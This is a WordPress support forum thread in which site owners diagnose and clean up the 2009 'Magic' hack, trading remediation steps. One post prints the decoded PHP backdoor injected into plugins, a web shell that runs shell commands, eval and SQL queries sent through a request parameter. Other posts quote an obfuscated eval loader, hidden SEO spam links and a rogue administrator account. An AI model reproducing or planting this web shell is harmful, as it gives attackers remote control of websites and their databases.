WordPress › Support » Editing triggers popup asking for username and password

captainhendry
Member
Posted 2 years ago #

Hey, I just got hit with this in the last couple hours. Blog was fine this morning. Suddenly I get the pop-up on every post. Popup said "Server says Magic" or something like that.

FYI, I was running 2.8.2 on Bluehost. Using Akismet for spam. I also approve every comment by a new author.

Checked FTP for recently added files and found one under WP-Admin called wp-rss.php. I still have the file. It's a long string of Hex code. If anyone wants a look, let me know and I'll e-mail it to you.

Anyway, I deleted it but still had the problem. Installed 2.8.3, changed my password and everything seems fine now.

This is the third time I've been hacked this summer. Anyone know how they're getting these files on my host? This is really getting old.

Also, just checked and nearly every one of my plugins had the hex code added up front. Anyone know where that came from?

David Tufts
Member
Posted 2 years ago #

We noticed that the code injected into the files was run through an eval and a decode so we decoded the string and found this php code:

{

if (!function_exists('______safeshell'))

{

function ______safeshell($komut) {

@ini_restore("safe_mode");

@ini_restore("open_basedir");

$disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));

if (!empty ($komut)) {

if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {

//@ ob_start();

@ passthru($komut);

//$res = @ ob_get_contents();

//@ ob_end_clean();

}

elseif (function_exists('system') && !in_array('system', $disable_functions)) {

//@ ob_start();

@ system($komut);

//$res = @ ob_get_contents();

//@ ob_end_clean();

}

elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {

$res = @ shell_exec($komut);

echo $res;

}

elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {

@ exec($komut, $res);

$res = join("\n", $res);

echo $res, "\n";

}

elseif (@ is_resource($f = @ popen($komut, "r"))) {

//$res = "";

while (!@ feof($f)) {

//$res .= @ fread($f, 1024);

echo(@ fread($f, 1024));

}

@ pclose($f);

}

else

{

$res = {$komut};

echo $res;

}

};

if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {

echo "<php_bdb7e9f039f4c7d9100073e131610a87_result>\n";

if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {

eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);

}

else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {

______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);

}

else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {

$result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);

if (!$result)

{

echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";

die();

}

else if (is_resource($result))

{

$res = array();

while ($row = mysql_fetch_assoc($result))

{

$res[] = $row;

};

mysql_free_result($result);

echo serialize($res);

die();

}

else

{

echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";

die();

}

};

echo "\n</php_bdb7e9f039f4c7d9100073e131610a87_result>\n";

die();

};

streetdaddy
Member
Posted 2 years ago #

anyone feel like explaining exactly what this is attempting to do? at a glance it looks like it is probing for an invulnerability either in the server configuration or wordpress itself?

danceadvantage
Member
Posted 2 years ago #

Is this a coincidence... or not?

Today I went to bluehost cpanel and logged into my email (webmail) account there. I wanted to check some things and also change my password. I was confronted with another alert message -- A username and password are being requested by https://boxxxx.bluehost.com:xxxx. The site says: "WebMail" --

Recognizing that this was exactly like the Magic thing, I kept hitting cancel until it went away. So, who do I alert about this? Did it happen BECAUSE I experienced the Magic problem?

My vars.php code looks clean, by the way. And no further problems with magic since I updated and cleaned the plugins (though I did notice some foreign code in my footer this week, which I removed). Where else do I need to look for malicious code? Any thoughts or suggestions?

danceadvantage
Member
Posted 2 years ago #

I just checked my footer.php again and more code had been inserted. This is just a sampling -

<p style="display: none"> <a href="http://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=adobe-presenter-for-mac">adobe presenter for mac</a>
<a href="http://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=acala-dvd-creator-3">acala dvd creator 3 download</a>
<a href="http://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=xilisoft-1click-dv-to-dvd">xilisoft 1click dv to dvd download</a>
<a href="http://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=futuremark-pcmark-vantage-advanced">futuremark pcmark vantage advanced</a>
<a href="http://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=xilisoft-video-converter-ultimate-5-1">xilisoft video converter ultimate 5.1</a>
<a href="http://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=roxio-copy---convert-3">download roxio copy & convert 3</a>

Where is it coming from and how can I get rid of it? Help please!

missjudy84
Member
Posted 2 years ago #

I encountered this same problem yesterday. This is what I had to do to get it fixed:

First I searched all .php files of my plugin (wp-content/plugins) and found some files starting with "<?php eval(gzinflate(base64_decode('1VVtT9swEP7c/gpTVSSRurEhoECB.... ?>" so I removed that from all the files and then updated the plugins, but it was still not working correctly. So this time I backedup my db and WordPress files and did the update right from the admin control panel and everything is working great.

danceadvantage
Member
Posted 2 years ago #

I removed foreign code from my plugins, changed passwords, and updated. This solved the problem of the authentication box appearing. However, later I discovered the above code and it is still appearing in my footer php. I have removed it and it returns within a couple of days. Is anyone else having this problem? I am not sure how or where the additional code is generating from. I would like to update to 2.8.4 but wanted to wait and see if I could find the culprit code that is infecting the footer since the update I did last time obviously did not completely cure the problem.

bh_WP_fan
Member
Posted 2 years ago #

danceadvantage, when it requests a username and password at box#.bluehost.com for webmail, that means that it no longer has the session authenticated and you need to login again. It is normal and not the results of a hack.

As to the current problems you are having, they are definitely the result of a hack. The first thing to do is to rename your plugins directory and change your theme to the default theme for the time being. If there are security issues through either of these, it will help to prevent the inserted code from reappearing.

After doing that, you should upload all of the WordPress core files from the current version of WordPress you are running over the top of the existing core files. If there are core files which have been hacked, this will put the correct code back up. Simply upgrading will also help with this oftentimes.

Read the sticky about the gooooogle hack and see if it applies to you.
Then you need to work on getting your site more secure. Make sure to only choose more recent versions of plugins. Don't pick a plugin that hasn't been tested to work with WordPress 2.8.x since a considerably older version of BlueHost. Find a theme that is also a more recent/updated theme.

Browse the forums for suggestions on securing your site.
Read the following:
http://codex.wordpress.org/Hardening_WordPress
http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
http://guvnr.com/web/blogging/10-tips-to-make-wordpress-hack-proof/
http://wordpress.org/support/topic/281767?replies=19

tgmcduff
Member
Posted 2 years ago #

Reuploading my original vars.php file seems to have solved the "Magic" problem. Comparing the dates and file sizes of other files with those on my local machine, I discovered that my .htaccess file had a different date 7/30/09. I know I didn't change it and no one else works on my site, so I replaced it with my original, too. So far, so good.

In hindsight, I probably should have downloaded it to look at and see what had been added/changed: it's only a text file after all.

Anybody else have their .htaccess file changed by this Trojan?

I'm still not clear how it got in. I don't allow comments unless they've been approved: too much spam.

williscreative
Member
Posted 2 years ago #

bh_WP_fan,

Where is “sticky about the gooooogle hack”, as you say above?

bh_WP_fan
Member
Posted 2 years ago #

http://wordpress.org/support/topic/293832?replies=15

yokima
Member
Posted 2 years ago #

this incident looks similar to what's being discussed on this thread: http://mashable.com/2009/09/05/wordpress-attack/ maybe it's the same issue?

martymankins
Member
Posted 2 years ago #

Got hit with the 'Magic" hack recently on one of my blogs. I was running 2.8.2 at the time.

Cleaned up all the code, replaced the vars.php file from a backup and then did a complete backup once I was sure all of the hacked code was gone from all plugins and elsewhere.

Now at 2.8.4, but wondering like the others here, if this will provide safety from this same hack.

Thanks go out to yokima and others who figured out how to get rid of this.

techartist
Member
Posted 2 years ago #

1. Re-uploaded wp-includes/vars.php from backed up copy. "Magic" authentication stopped.
2. Changed all admin passwords.
3. Upgraded site to latest version
4. Examined plugins for malicious code. Found one file infected and removed the code.
5. Backed up all files in case of next attack.

natarem
Member
Posted 2 years ago #

Has anyone decoded the code to see what it looks like?

exalkonium
Member
Posted 2 years ago #

Guys, I just experienced this, and thought about the users with access when I stumbled upon this:

When I would click on users with Administrator access, the indicator only showed (1), but when I clicked on the authors, the Administrator access indicator showed (2). It would go back and forth. So I decided to go into the database.

I went into the wp_usermeta table and searched for all records where the meta_key was like wp_user_level. Sure enough, 2 records popped up where the wp_user_level was 10(Administrator access), mine and one that was never there before!

So I grabbed the user_id from that, and looked in the wp_users table, and I search for the user where the id was the same as it was in the other table. The record that came up was a person I never heard of, and was there WITHOUT an email address listed in the database. This obviously is not right. You all might want to check your databases for extra users in there that shouldn't have administrator access, because I think this exploit places it in there. If you backed up your databases and re-imported them, you will just end up reimporting the same user back into WordPress!

Here is the details of the user that I found:
umeta_id = 593
user_id = 106
meta_key = wp_user_level
meta_value = 10
name = JohnathonTownsend73
password = $P$BZnYFY8XjH5w8yS.Div59Op0c/2AQA0
userid = johnathontownsend73
joindate = 2009-09-05 08:53:47

natarem
Member
Posted 2 years ago #

I found the same thing but two accounts, thanks for the tip.

natarem
Member
Posted 2 years ago #

Also, now I see above the decoded php. Sorry I missed it the first time through.

glcaff
Member
Posted 2 years ago #

Fixed! Running WP 2.8 and had the same problem. Re-uploaded wp-includes/vars.php and it's working again. Thanks for the help!

Celine Kiernan
Member
Posted 2 years ago #

HI Guys, I found 4 other authors on my users with access and it says that there are 2 administrators but I can only see one. I have NO CLUE how to do any of the stuff you guys are talking about (exalkonium, I don't even know how to find the database that you're searching) so I'm completely stumped. I tried to update my wordpress but it's asking me my host, username and password but accepting none of them. SOmeone help a complete net/computer moron fix this?

deperechamber
Member
Posted 2 years ago #

I've searched my plugins and my var.php file and I don't have any of the code. I'm using 2.8.4.

I get the user authentication request when trying to set uplinks inside a post.

roadsidephil
Member
Posted 2 years ago #

I've had the same problem today. I found the malicious code in one of my plugins and removed. Also found it in the vars.php and removed it.

I'm using version 2.8.2

Now two other things are happening. When I post a new entry from the main edit window, the resulting page is just a blank white one. The entry does post though. Same thing if updating an entry. Doesn't seem to do it from the quick edit page.

Also, I wanted to updgrade to 2.8.6. When I click Upgrade Automatically it just says it's downloading the files but doesn't go any farther.

derek23
Member
Posted 2 years ago #

Hi

This has just hit me as well and I really haven't got a clue what to do, I'm not a techie.

Can someone talk me through this in English please?

Derek

WordPress.org

Forums

Editing triggers popup asking for username and password - security breach? (83 posts)

Topic Closed

About this Topic

Tags

Code is Poetry